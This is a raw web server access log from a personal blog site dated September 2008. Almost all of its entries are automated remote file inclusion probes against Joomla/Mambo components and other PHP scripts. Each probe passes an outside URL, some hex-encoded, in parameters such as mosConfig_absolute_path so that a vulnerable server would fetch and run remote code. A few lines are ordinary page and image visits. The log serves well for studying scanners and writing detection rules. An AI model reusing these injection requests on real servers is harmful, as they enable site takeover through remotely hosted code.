210.245.166.92 - - [22/Sep/2008:10:11:10 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.202.123.186 - - [22/Sep/2008:10:11:21 -0700] "GET /logs/access_080830.log//administrator/index.php?option=com_phpshop&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:11:29 -0700] "GET /logs/access_080103.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:11:29 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:11:29 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
216.246.23.84 - - [22/Sep/2008:10:11:32 -0700] "GET /logs/access_080317.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.clubrexton.net/zboard//mraneti.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.246.23.84 - - [22/Sep/2008:10:11:32 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.clubrexton.net/zboard//mraneti.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.246.23.84 - - [22/Sep/2008:10:11:33 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.clubrexton.net/zboard//mraneti.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.246.23.84 - - [22/Sep/2008:10:11:33 -0700] "GET /logs/access_080804.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.clubrexton.net/zboard//mraneti.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.246.23.84 - - [22/Sep/2008:10:11:33 -0700] "GET /logs//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.clubrexton.net/zboard//mraneti.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:11:34 -0700] "GET /logs/access_080211.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
82.165.39.186 - - [22/Sep/2008:10:11:39 -0700] "GET /logs/access_080807.log//tools/send_reminders.php?noSet=0&includedir=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
82.165.39.186 - - [22/Sep/2008:10:11:40 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
82.165.39.186 - - [22/Sep/2008:10:11:40 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
82.165.39.186 - - [22/Sep/2008:10:11:40 -0700] "GET /logs/access_080803.log//tools/send_reminders.php?noSet=0&includedir=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:11:43 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:11:43 -0700] "GET /logs/access_080401.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:11:44 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 200 50 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
216.246.23.84 - - [22/Sep/2008:10:11:53 -0700] "GET /logs/access_080317.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.clubrexton.net/zboard//mraneti.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:11:57 -0700] "GET /logs//inc/functions.inc.php?config[ppa_root_path]=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:11:57 -0700] "GET /logs/access_071127.log//inc/functions.inc.php?config[ppa_root_path]=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:11:57 -0700] "GET //inc/functions.inc.php?config[ppa_root_path]=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
216.246.23.84 - - [22/Sep/2008:10:11:59 -0700] "GET /logs/access_080327.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.clubrexton.net/zboard//mraneti.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.246.23.84 - - [22/Sep/2008:10:11:59 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.clubrexton.net/zboard//mraneti.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.246.23.84 - - [22/Sep/2008:10:11:59 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.clubrexton.net/zboard//mraneti.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.246.23.84 - - [22/Sep/2008:10:12:00 -0700] "GET /logs/access_080407.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.clubrexton.net/zboard//mraneti.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:12:03 -0700] "GET /logs/access_080322.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
72.249.96.204 - - [22/Sep/2008:10:12:05 -0700] "GET /logs/access_080301.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.249.96.204 - - [22/Sep/2008:10:12:05 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.249.96.204 - - [22/Sep/2008:10:12:05 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.11.230.32 - - [22/Sep/2008:10:12:08 -0700] "GET /logs/access_080301.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://zvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.11.230.32 - - [22/Sep/2008:10:12:08 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://zvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.11.230.32 - - [22/Sep/2008:10:12:08 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://zvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.85.192.194 - - [22/Sep/2008:10:12:11 -0700] "GET /logs/access_080301.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.192.194 - - [22/Sep/2008:10:12:11 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.192.194 - - [22/Sep/2008:10:12:11 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.249.96.204 - - [22/Sep/2008:10:12:15 -0700] "GET /logs/access_080222.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.11.230.32 - - [22/Sep/2008:10:12:18 -0700] "GET /logs/access_080222.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://zvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.85.192.194 - - [22/Sep/2008:10:12:21 -0700] "GET /logs/access_080222.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
219.85.63.226 - - [22/Sep/2008:10:12:26 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.crosstalk.cc/NT_files/idfx.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
219.85.63.226 - - [22/Sep/2008:10:12:26 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.crosstalk.cc/NT_files/idfx.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:12:29 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:12:31 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
69.64.93.234 - - [22/Sep/2008:10:12:39 -0700] "GET /logs/access_080301.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.93.234 - - [22/Sep/2008:10:12:39 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.93.234 - - [22/Sep/2008:10:12:40 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.93.234 - - [22/Sep/2008:10:12:49 -0700] "GET /logs/access_080222.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.48.68.79 - - [22/Sep/2008:10:12:51 -0700] "GET /logs/access_080714.log//administrator/index.php?option=com_mgm&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.85.63.226 - - [22/Sep/2008:10:12:55 -0700] "GET /logs/access_080804.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.crosstalk.cc/NT_files/idfx.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
204.8.223.144 - - [22/Sep/2008:10:12:56 -0700] "GET /logs/access_080906.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.trade-an-item.com/docs/sql/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.8.223.144 - - [22/Sep/2008:10:12:56 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.trade-an-item.com/docs/sql/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.8.223.144 - - [22/Sep/2008:10:12:56 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.trade-an-item.com/docs/sql/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.8.223.144 - - [22/Sep/2008:10:12:57 -0700] "GET /logs/access_080703.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.trade-an-item.com/docs/sql/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.150.68.97 - - [22/Sep/2008:10:13:13 -0700] "GET /blog/ HTTP/1.1" 200 0 "http://images.google.es/imgres?imgurl=http://dmulk.com/blog/wp-content/uploads/2008/04/img_1135.JPG&imgrefurl=http://dmulk.com/blog/&h=2592&w=3888&sz=3026&hl=es&start=124&usg=__LJpt2cGPDw6Sb3JA7OY9P80KP_Y=&tbnid=MAVH_eSGud0roM:&tbnh=100&tbnw=150&prev=/images%3Fq%3Dbroken%2Bhelmet%26start%3D105%26imgsz%3Dhuge%26gbv%3D2%26ndsp%3D21%26hl%3Des%26safe%3Doff%26sa%3DN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)" "dmulk.com"
79.150.68.97 - - [22/Sep/2008:10:13:28 -0700] "GET /blog/wp-content/uploads/2008/04/img_1135.JPG HTTP/1.1" 200 3097783 "http://images.google.es/imgres?imgurl=http://dmulk.com/blog/wp-content/uploads/2008/04/img_1135.JPG&imgrefurl=http://dmulk.com/blog/&h=2592&w=3888&sz=3026&tbnid=MAVH_eSGud0roM:&tbnh=100&tbnw=150&hl=es&prev=/images%3Fq%3Dbroken%2Bhelmet%26start%3D105%26imgsz%3Dhuge%26gbv%3D2%26ndsp%3D21%26hl%3Des%26safe%3Doff%26sa%3DN&frame=small" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)" "dmulk.com"
79.150.68.97 - - [22/Sep/2008:10:13:29 -0700] "GET /blog/ HTTP/1.1" 200 94341 "http://images.google.es/imgres?imgurl=http://dmulk.com/blog/wp-content/uploads/2008/04/img_1135.JPG&imgrefurl=http://dmulk.com/blog/&h=2592&w=3888&sz=3026&hl=es&start=124&usg=__LJpt2cGPDw6Sb3JA7OY9P80KP_Y=&tbnid=MAVH_eSGud0roM:&tbnh=100&tbnw=150&prev=/images%3Fq%3Dbroken%2Bhelmet%26start%3D105%26imgsz%3Dhuge%26gbv%3D2%26ndsp%3D21%26hl%3Des%26safe%3Doff%26sa%3DN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)" "dmulk.com"
79.150.68.97 - - [22/Sep/2008:10:13:30 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.1" 200 9232 "http://dmulk.com/blog/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)" "dmulk.com"
212.67.202.75 - - [22/Sep/2008:10:13:35 -0700] "GET /logs/access_080301.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://zvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
212.67.202.75 - - [22/Sep/2008:10:13:36 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://zvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
212.67.202.75 - - [22/Sep/2008:10:13:36 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://zvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
12.21.204.78 - - [22/Sep/2008:10:13:41 -0700] "GET /logs/access_080521.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.21.204.78 - - [22/Sep/2008:10:13:41 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.21.204.78 - - [22/Sep/2008:10:13:41 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [22/Sep/2008:10:14:04 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.crosstalk.cc/NT_files/idfx.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
219.85.63.226 - - [22/Sep/2008:10:14:04 -0700] "GET /logs/access_080703.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.crosstalk.cc/NT_files/idfx.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
219.85.63.226 - - [22/Sep/2008:10:14:04 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.crosstalk.cc/NT_files/idfx.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
206.220.64.3 - - [22/Sep/2008:10:14:05 -0700] "GET /logs/access_080131.log//index.php?pagina=http://h1.ripway.com/dr4g0n/scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:14:06 -0700] "GET /logs/access_080211.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:14:06 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:14:07 -0700] "GET /logs/access_080103.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
206.220.64.3 - - [22/Sep/2008:10:14:07 -0700] "GET //index.php?pagina=http://h1.ripway.com/dr4g0n/scan/id.txt?? HTTP/1.1" 200 94759 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.95.209 - - [22/Sep/2008:10:14:08 -0700] "GET /logs/access_080507.log/index2.php?mosConfig_absolute_path=http://www.intertex99.com/images/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.95.209 - - [22/Sep/2008:10:14:08 -0700] "GET /index2.php?mosConfig_absolute_path=http://www.intertex99.com/images/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.95.209 - - [22/Sep/2008:10:14:08 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://www.intertex99.com/images/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.220.64.3 - - [22/Sep/2008:10:14:09 -0700] "GET /logs//index.php?pagina=http://h1.ripway.com/dr4g0n/scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:14:11 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:14:11 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:14:11 -0700] "GET /logs/access_080407.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:14:12 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:14:13 -0700] "GET /logs/access_080407.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:14:18 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:14:18 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
77.222.40.34 - - [22/Sep/2008:10:14:24 -0700] "GET /logs/access_080906.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.trade-an-item.com/docs/sql/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.34 - - [22/Sep/2008:10:14:24 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.trade-an-item.com/docs/sql/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.34 - - [22/Sep/2008:10:14:25 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.trade-an-item.com/docs/sql/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [22/Sep/2008:10:14:25 -0700] "GET /logs/access_080804.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.crosstalk.cc/NT_files/idfx.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
77.222.40.34 - - [22/Sep/2008:10:14:34 -0700] "GET /logs/access_080703.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.trade-an-item.com/docs/sql/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.23.84 - - [22/Sep/2008:10:15:13 -0700] "GET /logs/access_080707.log//index.php?opcao=http://www.clubrexton.net/zboard//mraneti.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.246.23.84 - - [22/Sep/2008:10:15:13 -0700] "GET /logs//index.php?opcao=http://www.clubrexton.net/zboard//mraneti.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.246.23.84 - - [22/Sep/2008:10:15:13 -0700] "GET /logs/access_080510.log//index.php?opcao=http://www.clubrexton.net/zboard//mraneti.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.246.23.84 - - [22/Sep/2008:10:15:13 -0700] "GET //index.php?opcao=http://www.clubrexton.net/zboard//mraneti.txt??%0D?? HTTP/1.1" 200 94859 "-" "libwww-perl/5.814" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:10:15:19 -0700] "GET /logs/access_080830.log/includes/useragent.inc.php?prefix=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.67.202.75 - - [22/Sep/2008:10:15:19 -0700] "GET /logs/access_080731.log/index.php?pag=http://zvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
212.67.202.75 - - [22/Sep/2008:10:15:20 -0700] "GET /index.php?pag=http://zvze.centelia.org/img/b?? HTTP/1.1" 200 94686 "-" "libwww-perl/5.68" "www.dmulk.com"
212.67.202.75 - - [22/Sep/2008:10:15:21 -0700] "GET /logs/index.php?pag=http://zvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
77.222.40.42 - - [22/Sep/2008:10:15:22 -0700] "GET /logs/access_080906.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.trade-an-item.com/docs/sql/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.42 - - [22/Sep/2008:10:15:22 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.trade-an-item.com/docs/sql/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
